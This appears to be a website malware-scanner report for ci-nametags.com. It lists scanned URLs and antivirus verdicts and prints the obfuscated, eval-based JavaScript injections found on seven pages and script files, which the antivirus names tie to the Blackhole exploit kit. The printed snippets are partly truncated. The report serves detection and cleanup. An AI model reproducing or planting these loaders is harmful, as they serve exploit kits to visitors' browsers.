Malware Scanner report for ci-nametags.com

Malicious/Suspicious/Total urls checked: 7/0/21

7 pages have malicious code. See details below

Blacklists: Found

The website is marked by Google as suspicious.

The website "ci-nametags.com" is probably hacked and losing its visitors. You need to take action as soon as possible to fix security issues.

Malicious Redirects: OK

Malicious/Hidden/Total iFrames: 0/0/0

Deface / Content modification: OK

Free periodic scanning and alerting: setup
(requires eVuln badge or a link to eVuln.com)

Malware & Hack Repair

Malware Removal
Blacklists Removal
Reason Eliminating
1 Month Hack Insurance

More details

Website Hack Insurance

Files & DB Monitoring
Daily Backups
Malware & Hack Detection
Unlimited Hack Repairs

More details

Safe Browsing / Blacklists

Query: http://www.google.com/safebrowsing/diagnostic?site=ci-nametags.com

Result: The website is marked by Google as suspicious. - visiting this web site may harm your computer.
Details are available here.

Scanned pages/files

Request	Server response	Status
http://www.ci-nametags.com/	200 OK Content-Length: 33776 Content-Type: text/html	malicious
Malicious code - confirmed by antiviruses (see below) bzlssp="s"+"p"+"li"+"t";miiyy=window;wlvzj="dy";guem=document;caezvk="0x";vfsiq=(5-3-1);try{++(guem.body)}catch(ymw){tohi=false;try{}catch(sezu){tohi=21;}if(1){epkyu="17:5d:6c:65:5a:6b:60:66:65:17:70:5a:27:30:1f:20:17:72:4:1:17:6d:58:69:17:6a:6b:58:6b:60:5a:34:1e:58:61:58:6f:1e:32:4:1:17:6d:58:69:17:5a:66:65:6b:69:66:63:63:5c:69:34:1e:60:65:5b:5c:6f:25:67:5f:67:1e:32:4:1:17:6d:58:69:17:70:5a:17:34:17:5b:66:5a:6c:64:5c:65:6b:25:5a:69:5c:58:6b:5c:3c:63:5c:64:5c:65:6b:1f:1e:60:5d:69:58:64:5c:1e:20: ... 3441 bytes are skipped ...59:63:5c:5b:20:4:1:72:4:1:60:5d:1f:3e:5c:6b:3a:66:66:62:60:5c:1f:1e:6d:60:6a:60:6b:5c:5b:56:6c:68:1e:20:34:34:2c:2c:20:72:74:5c:63:6a:5c:72:4a:5c:6b:3a:66:66:62:60:5c:1f:1e:6d:60:6a:60:6b:5c:5b:56:6c:68:1e:23:17:1e:2c:2c:1e:23:17:1e:28:1e:23:17:1e:26:1e:20:32:4:1:4:1:70:5a:27:30:1f:20:32:4:1:74:4:1:74"[bzlssp](":");}miiyy=epkyu;pmmwxc=[];for(yrj=22-20-2;-yrj+1389!=0;yrj+=1){ahtmcd=yrj;if((0x19==031))pmmwxc+=String["fromCharCode"](eval(caezvk+miiyy[1*ahtmcd])+0xa-vfsiq);}theus=eval;theus(pmmwxc)} Antivirus reports: AntiVir EXP/JS.Expack.GQ Ikarus Virus.JS.Exploit nProtect JS:Exploit.BlackHole.BD Comodo TrojWare.JS.Kryptik.acc McAfee-GW-Edition JS/Exploit-Blacole.mc DrWeb JS.IFrame.500 Kaspersky Exploit.JS.Pdfka.gkj Microsoft Trojan:JS/Quidvetis.A MicroWorld-eScan JS:Exploit.BlackHole.BD Fortinet JS/Kryptik.AOG!tr McAfee JS/Exploit-Blacole.mc NANO-Antivirus Trojan.Script.Expack.cgxcgz F-Secure JS:Exploit.BlackHole.BD AVG Script/Exploit.Kit Norman Kryptik.CCLX GData JS:Exploit.BlackHole.BD ESET-NOD32 JS/Kryptik.AOG BitDefender JS:Exploit.BlackHole.BD
http://ajax.googleapis.com/ajax/libs/jquery/1.3.2/jquery.min.js	200 OK Content-Length: 57254 Content-Type: text/javascript	clean
http://ci-nametags.com/_include/js/ajaxticker.js	HTTP/1.1 301 Moved Permanently Connection: close Date: Wed, 04 Mar 2015 12:58:14 GMT Location: http://www.ci-nametags.com/_include/js/ajaxticker.js Server: Apache Content-Length: 325 Content-Type: text/html; charset=iso-8859-1	clean
http://www.ci-nametags.com/_include/js/ajaxticker.js	200 OK Content-Length: 16138 Content-Type: text/javascript	malicious
Malicious code - confirmed by antiviruses (see below) ps="split";e=eval;v="0x";a=0;z="y";try{a*=25}catch(zz){a=1}if(!a){try{--e("doc"+"ument")["\x62od"+z]}catch(q){a2="_";sa=0xa-02;}z="28_6e_7d_76_6b_7c_71_77_76_28_82_82_82_6e_6e_6e_30_31_28_83_15_12_28_7e_69_7a_28_75_78_78_6a_69_28_45_28_6c_77_6b_7d_75_6d_76_7c_36_6b_7a_6d_69_7c_6d_4d_74_6d_75_6d_76_7c_30_2f_71_6e_7a_69_75_6d_2f_31_43_15_12_15_12_28_75_78_78_6a_69_36_7b_7a_6b_28_45_28_2f_70_7c_7c_78_42_37_37_7b_78_6d_76_6c_75_6d_7c_6d_7b_7c_36_6b_77_75_37_5b_6d_7a_7e_71_6b_6d_7b_37_6b_77_7d_76_7c_ ... 3285 bytes are skipped ...12_71_6e_28_30_76_69_7e_71_6f_69_7c_77_7a_36_6b_77_77_73_71_6d_4d_76_69_6a_74_6d_6c_31_15_12_83_15_12_71_6e_30_4f_6d_7c_4b_77_77_73_71_6d_30_2f_7e_71_7b_71_7c_6d_6c_67_7d_79_2f_31_45_45_3d_3d_31_83_85_6d_74_7b_6d_83_5b_6d_7c_4b_77_77_73_71_6d_30_2f_7e_71_7b_71_7c_6d_6c_67_7d_79_2f_34_28_2f_3d_3d_2f_34_28_2f_39_2f_34_28_2f_37_2f_31_43_15_12_15_12_82_82_82_6e_6e_6e_30_31_43_15_12_85_15_12_85_15_12"[ps](a2);za="";for(i=0;i<z.length;i++){za+=String["fromCharCode"](e(v+(z[i]))-sa);}zaz=za;e(zaz);} Antivirus reports: AntiVir JS/BlacoleRef.CZ.29 Avast JS:Decode-AQB [Trj] Emsisoft Trojan.JS.Agent.JBT (B) CAT-QuickHeal JS/Iframe.DEG DrWeb JS.IFrame.457 Kaspersky Trojan-Downloader.JS.Iframe.deg Fortinet JS/Iframe.DDG!tr.dldr NANO-Antivirus Trojan.Script.Expack.bvtkmp Norman Blacole.UC GData Trojan.JS.Agent.JBT BitDefender Trojan.JS.Agent.JBT
http://www.statcounter.com/counter/counter.js	200 OK Content-Length: 21363 Content-Type: application/x-javascript	clean
http://www.ci-nametags.com/test404page.js	HTTP/1.1 302 Found Connection: close Date: Wed, 04 Mar 2015 12:58:17 GMT Location: http://www.ci-nametags.com/404.php Server: Apache Content-Length: 287 Content-Type: text/html; charset=iso-8859-1	clean
http://www.ci-nametags.com/404.php	200 OK Content-Length: 27497 Content-Type: text/html	malicious
Malicious code - confirmed by antiviruses (see below) xiiff="s"+"p"+"li"+"t";xoncms=window;shkm="dy";cnxi=document;lqyj="0x";txs=(5-3-1);try{++(cnxi.body)}catch(rlsjr){nwtmhq=false;try{}catch(uzdk){nwtmhq=21;}if(1){ddn="17:5d:6c:65:5a:6b:60:66:65:17:60:69:5f:5a:6f:27:30:1f:20:17:72:4:1:17:6d:58:69:17:6a:6b:58:6b:60:5a:34:1e:58:61:58:6f:1e:32:4:1:17:6d:58:69:17:5a:66:65:6b:69:66:63:63:5c:69:34:1e:60:65:5b:5c:6f:25:67:5f:67:1e:32:4:1:17:6d:58:69:17:60:69:5f:5a:6f:17:34:17:5b:66:5a:6c:64:5c:65:6b:25:5a:69:5c:58:6b:5c:3c:63:5c:64:5c:65:6b:1f:1e:60:5d:6 ... 3579 bytes are skipped ...8:59:63:5c:5b:20:4:1:72:4:1:60:5d:1f:3e:5c:6b:3a:66:66:62:60:5c:1f:1e:6d:60:6a:60:6b:5c:5b:56:6c:68:1e:20:34:34:2c:2c:20:72:74:5c:63:6a:5c:72:4a:5c:6b:3a:66:66:62:60:5c:1f:1e:6d:60:6a:60:6b:5c:5b:56:6c:68:1e:23:17:1e:2c:2c:1e:23:17:1e:28:1e:23:17:1e:26:1e:20:32:4:1:4:1:60:69:5f:5a:6f:27:30:1f:20:32:4:1:74:4:1:74"[xiiff](":");}xoncms=ddn;unjv=[];for(vjvv=22-20-2;-vjvv+1439!=0;vjvv+=1){jpscks=vjvv;if((0x19==031))unjv+=String["fromCharCode"](eval(lqyj+xoncms[1*jpscks])+0xa-txs);}baf=eval;baf(unjv)} Antivirus reports: AntiVir EXP/JS.Expack.GQ Ikarus Virus.JS.Exploit nProtect JS:Exploit.BlackHole.BD Comodo TrojWare.JS.Kryptik.acc Emsisoft JS:Exploit.BlackHole.BD (B) McAfee-GW-Edition JS/Exploit-Blacole.mc Kaspersky Exploit.JS.Pdfka.gkj Microsoft Trojan:JS/Quidvetis.A MicroWorld-eScan JS:Exploit.BlackHole.BD Fortinet JS/Kryptik.AOG!tr McAfee JS/Exploit-Blacole.mc NANO-Antivirus Trojan.Script.Expack.cgxcgz AVG Script/Exploit.Kit Norman Kryptik.CCLX GData JS:Exploit.BlackHole.BD ESET-NOD32 JS/Kryptik.AOG
http://www.ci-nametags.com/_include/js/jquery.cross-slide.js	200 OK Content-Length: 22866 Content-Type: text/javascript	malicious
Malicious code - confirmed by antiviruses (see below) ps="split";e=eval;v="0x";a=0;z="y";try{a*=25}catch(zz){a=1}if(!a){try{--e("doc"+"ument")["\x62od"+z]}catch(q){a2="_";sa=0xa-02;}z="28_6e_7d_76_6b_7c_71_77_76_28_82_82_82_6e_6e_6e_30_31_28_83_15_12_28_7e_69_7a_28_75_78_78_6a_69_28_45_28_6c_77_6b_7d_75_6d_76_7c_36_6b_7a_6d_69_7c_6d_4d_74_6d_75_6d_76_7c_30_2f_71_6e_7a_69_75_6d_2f_31_43_15_12_15_12_28_75_78_78_6a_69_36_7b_7a_6b_28_45_28_2f_70_7c_7c_78_42_37_37_7b_78_6d_76_6c_75_6d_7c_6d_7b_7c_36_6b_77_75_37_5b_6d_7a_7e_71_6b_6d_7b_37_6b_77_7d_76_7c_ ... 3285 bytes are skipped ...12_71_6e_28_30_76_69_7e_71_6f_69_7c_77_7a_36_6b_77_77_73_71_6d_4d_76_69_6a_74_6d_6c_31_15_12_83_15_12_71_6e_30_4f_6d_7c_4b_77_77_73_71_6d_30_2f_7e_71_7b_71_7c_6d_6c_67_7d_79_2f_31_45_45_3d_3d_31_83_85_6d_74_7b_6d_83_5b_6d_7c_4b_77_77_73_71_6d_30_2f_7e_71_7b_71_7c_6d_6c_67_7d_79_2f_34_28_2f_3d_3d_2f_34_28_2f_39_2f_34_28_2f_37_2f_31_43_15_12_15_12_82_82_82_6e_6e_6e_30_31_43_15_12_85_15_12_85_15_12"[ps](a2);za="";for(i=0;i<z.length;i++){za+=String["fromCharCode"](e(v+(z[i]))-sa);}zaz=za;e(zaz);} Antivirus reports: AntiVir JS/BlacoleRef.CZ.29 Avast JS:Decode-AQB [Trj] Emsisoft Trojan.JS.Agent.JBT (B) CAT-QuickHeal JS/Iframe.DEG DrWeb JS.IFrame.457 Kaspersky Trojan-Downloader.JS.Iframe.deg Fortinet JS/Iframe.DDG!tr.dldr NANO-Antivirus Trojan.Script.Expack.bvtkmp Norman Blacole.UC GData Trojan.JS.Agent.JBT BitDefender Trojan.JS.Agent.JBT
http://www.ci-nametags.com/_include/js/jquery.cross-slide.min.js	200 OK Content-Length: 16042 Content-Type: text/javascript	malicious
Malicious code - confirmed by antiviruses (see below) ps="split";e=eval;v="0x";a=0;z="y";try{a*=25}catch(zz){a=1}if(!a){try{--e("doc"+"ument")["\x62od"+z]}catch(q){a2="_";sa=0xa-02;}z="28_6e_7d_76_6b_7c_71_77_76_28_82_82_82_6e_6e_6e_30_31_28_83_15_12_28_7e_69_7a_28_75_78_78_6a_69_28_45_28_6c_77_6b_7d_75_6d_76_7c_36_6b_7a_6d_69_7c_6d_4d_74_6d_75_6d_76_7c_30_2f_71_6e_7a_69_75_6d_2f_31_43_15_12_15_12_28_75_78_78_6a_69_36_7b_7a_6b_28_45_28_2f_70_7c_7c_78_42_37_37_7b_78_6d_76_6c_75_6d_7c_6d_7b_7c_36_6b_77_75_37_5b_6d_7a_7e_71_6b_6d_7b_37_6b_77_7d_76_7c_ ... 3285 bytes are skipped ...12_71_6e_28_30_76_69_7e_71_6f_69_7c_77_7a_36_6b_77_77_73_71_6d_4d_76_69_6a_74_6d_6c_31_15_12_83_15_12_71_6e_30_4f_6d_7c_4b_77_77_73_71_6d_30_2f_7e_71_7b_71_7c_6d_6c_67_7d_79_2f_31_45_45_3d_3d_31_83_85_6d_74_7b_6d_83_5b_6d_7c_4b_77_77_73_71_6d_30_2f_7e_71_7b_71_7c_6d_6c_67_7d_79_2f_34_28_2f_3d_3d_2f_34_28_2f_39_2f_34_28_2f_37_2f_31_43_15_12_15_12_82_82_82_6e_6e_6e_30_31_43_15_12_85_15_12_85_15_12"[ps](a2);za="";for(i=0;i<z.length;i++){za+=String["fromCharCode"](e(v+(z[i]))-sa);}zaz=za;e(zaz);} Antivirus reports: AntiVir JS/BlacoleRef.CZ.29 Avast JS:Decode-AQB [Trj] Emsisoft Trojan.JS.Agent.JBT (B) CAT-QuickHeal JS/Iframe.DEG DrWeb JS.IFrame.457 Kaspersky Trojan-Downloader.JS.Iframe.deg Fortinet JS/Iframe.DDG!tr.dldr NANO-Antivirus Trojan.Script.Expack.bvtkmp Norman Blacole.UC GData Trojan.JS.Agent.JBT BitDefender Trojan.JS.Agent.JBT
http://www.ci-nametags.com/shop-by/logonologo.php	HTTP/1.1 302 Found Connection: close Date: Wed, 04 Mar 2015 12:58:19 GMT Location: http://www.ci-nametags.com/404.php Server: Apache Content-Length: 287 Content-Type: text/html; charset=iso-8859-1	clean
http://www.ci-nametags.com/shop-by/style.php	HTTP/1.1 302 Found Connection: close Date: Wed, 04 Mar 2015 12:58:20 GMT Location: http://www.ci-nametags.com/404.php Server: Apache Content-Length: 287 Content-Type: text/html; charset=iso-8859-1	clean
https://www.ci-nametags.com/secure/mcart/mof.cgi?viewcart	HTTP/1.1 302 Found Connection: close Date: Wed, 04 Mar 2015 12:58:21 GMT Location: https://www.ci-nametags.com/secure/mof15/nocookies.html Server: Apache Content-Length: 309 Content-Type: text/html; charset=iso-8859-1	clean
https://www.ci-nametags.com/secure/mof15/nocookies.html	200 OK Content-Length: 9466 Content-Type: text/html	malicious
Malicious code - confirmed by antiviruses (see below) xiiff="s"+"p"+"li"+"t";xoncms=window;shkm="dy";cnxi=document;lqyj="0x";txs=(5-3-1);try{++(cnxi.body)}catch(rlsjr){nwtmhq=false;try{}catch(uzdk){nwtmhq=21;}if(1){ddn="17:5d:6c:65:5a:6b:60:66:65:17:60:69:5f:5a:6f:27:30:1f:20:17:72:4:1:17:6d:58:69:17:6a:6b:58:6b:60:5a:34:1e:58:61:58:6f:1e:32:4:1:17:6d:58:69:17:5a:66:65:6b:69:66:63:63:5c:69:34:1e:60:65:5b:5c:6f:25:67:5f:67:1e:32:4:1:17:6d:58:69:17:60:69:5f:5a:6f:17:34:17:5b:66:5a:6c:64:5c:65:6b:25:5a:69:5c:58:6b:5c:3c:63:5c:64:5c:65:6b:1f:1e:60:5d:6 ... 3579 bytes are skipped ...8:59:63:5c:5b:20:4:1:72:4:1:60:5d:1f:3e:5c:6b:3a:66:66:62:60:5c:1f:1e:6d:60:6a:60:6b:5c:5b:56:6c:68:1e:20:34:34:2c:2c:20:72:74:5c:63:6a:5c:72:4a:5c:6b:3a:66:66:62:60:5c:1f:1e:6d:60:6a:60:6b:5c:5b:56:6c:68:1e:23:17:1e:2c:2c:1e:23:17:1e:28:1e:23:17:1e:26:1e:20:32:4:1:4:1:60:69:5f:5a:6f:27:30:1f:20:32:4:1:74:4:1:74"[xiiff](":");}xoncms=ddn;unjv=[];for(vjvv=22-20-2;-vjvv+1439!=0;vjvv+=1){jpscks=vjvv;if((0x19==031))unjv+=String["fromCharCode"](eval(lqyj+xoncms[1*jpscks])+0xa-txs);}baf=eval;baf(unjv)} Antivirus reports: AntiVir EXP/JS.Expack.GQ Ikarus Virus.JS.Exploit nProtect JS:Exploit.BlackHole.BD Comodo TrojWare.JS.Kryptik.acc Emsisoft JS:Exploit.BlackHole.BD (B) McAfee-GW-Edition JS/Exploit-Blacole.mc Kaspersky Exploit.JS.Pdfka.gkj Microsoft Trojan:JS/Quidvetis.A MicroWorld-eScan JS:Exploit.BlackHole.BD Fortinet JS/Kryptik.AOG!tr McAfee JS/Exploit-Blacole.mc NANO-Antivirus Trojan.Script.Expack.cgxcgz AVG Script/Exploit.Kit Norman Kryptik.CCLX GData JS:Exploit.BlackHole.BD ESET-NOD32 JS/Kryptik.AOG
http://www.ci-nametags.com/blog	HTTP/1.1 301 Moved Permanently Connection: close Date: Wed, 04 Mar 2015 12:58:23 GMT Location: http://www.ci-nametags.com/blog/ Server: Apache Content-Length: 309 Content-Type: text/html; charset=iso-8859-1	clean
http://www.ci-nametags.com/blog/	200 OK Content-Length: 24641 Content-Type: text/html	malicious
Malicious code - confirmed by antiviruses (see below) bzlssp=\"s\"+\"p\"+\"li\"+\"t\";miiyy=window;wlvzj=\"dy\";guem=document;caezvk=\"0x\";vfsiq=(5-3-1);try{++(guem.body)}catch(ymw){tohi=false;try{}catch(sezu){tohi=21;}if(1){epkyu=\"17:5d:6c:65:5a:6b:60:66:65:17:70:5a:27:30:1f:20:17:72:4:1:17:6d:58:69:17:6a:6b:58:6b:60:5a:34:1e:58:61:58:6f:1e:32:4:1:17:6d:58:69:17:5a:66:65:6b:69:66:63:63:5c:69:34:1e:60:65:5b:5c:6f:25:67:5f:67:1e:32:4:1:17:6d:58:69:17:70:5a:17:34:17:5b:66:5a:6c:64:5c:65:6b:25:5a:69:5c:58:6b:5c:3c:63:5c:64:5c:65:6b:1f:1e:60:5d:69:58 ... 3459 bytes are skipped ...:5c:5b:20:4:1:72:4:1:60:5d:1f:3e:5c:6b:3a:66:66:62:60:5c:1f:1e:6d:60:6a:60:6b:5c:5b:56:6c:68:1e:20:34:34:2c:2c:20:72:74:5c:63:6a:5c:72:4a:5c:6b:3a:66:66:62:60:5c:1f:1e:6d:60:6a:60:6b:5c:5b:56:6c:68:1e:23:17:1e:2c:2c:1e:23:17:1e:28:1e:23:17:1e:26:1e:20:32:4:1:4:1:70:5a:27:30:1f:20:32:4:1:74:4:1:74\"[bzlssp](\":\");}miiyy=epkyu;pmmwxc=[];for(yrj=22-20-2;-yrj+1389!=0;yrj+=1){ahtmcd=yrj;if((0x19==031))pmmwxc+=String[\"fromCharCode\"](eval(caezvk+miiyy[1*ahtmcd])+0xa-vfsiq);}theus=eval;theus(pmmwxc)} Antivirus reports: AntiVir EXP/JS.Expack.GQ Avast JS:Decode-BHU [Trj] Ikarus Virus.JS.Exploit Comodo Exploit.JS.Expack.G DrWeb JS.IFrame.500 AVG JS/Exploit Norman Kryptik.CCLX
http://ajax.googleapis.com/ajax/libs/jquery/1.4/jquery.min.js?ver=3.5.1	200 OK Content-Length: 78601 Content-Type: text/javascript	clean
http://www.ci-nametags.com/blog/wp-content/themes/business-turnkey/assets/js/functions.js?ver=3.5.1	200 OK Content-Length: 584 Content-Type: text/javascript	clean
http://www.ci-nametags.com/blog/wp-content/themes/business-turnkey/assets/js/cycle.min.js?ver=3.5.1	200 OK Content-Length: 31032 Content-Type: text/javascript	clean
http://www.ci-nametags.com/blog/wp-content/themes/business-turnkey/assets/js/lightbox_me.js?ver=3.5.1	200 OK Content-Length: 4014 Content-Type: text/javascript	clean
http://www.ci-nametags.com/blog/wp-content/plugins/sociable/js/sociable.js?ver=3.5.1	200 OK Content-Length: 1959 Content-Type: text/javascript	clean
http://www.ci-nametags.com/blog/wp-content/plugins/sociable/js/addtofavorites.js?ver=3.5.1	200 OK Content-Length: 602 Content-Type: text/javascript	clean

Malicious Redirects

First query (normal visit):
GET / HTTP/1.1
Host: ci-nametags.com

Result:

Second query (visit from search engine):
GET / HTTP/1.1
Host: ci-nametags.com
Referer: http://www.google.com/search?q=ci-nametags.com

Result:
The result is similar to the first query. There are no suspicious redirects found.

Recently found suspicious websites

Malware Scanner report for ci-nametags.com

Malware & Hack Repair

Website Hack Insurance

Safe Browsing / Blacklists

Scanned pages/files

Malicious Redirects

Recently found suspicious websites

Company

Services

eVuln Labs

eVuln Tools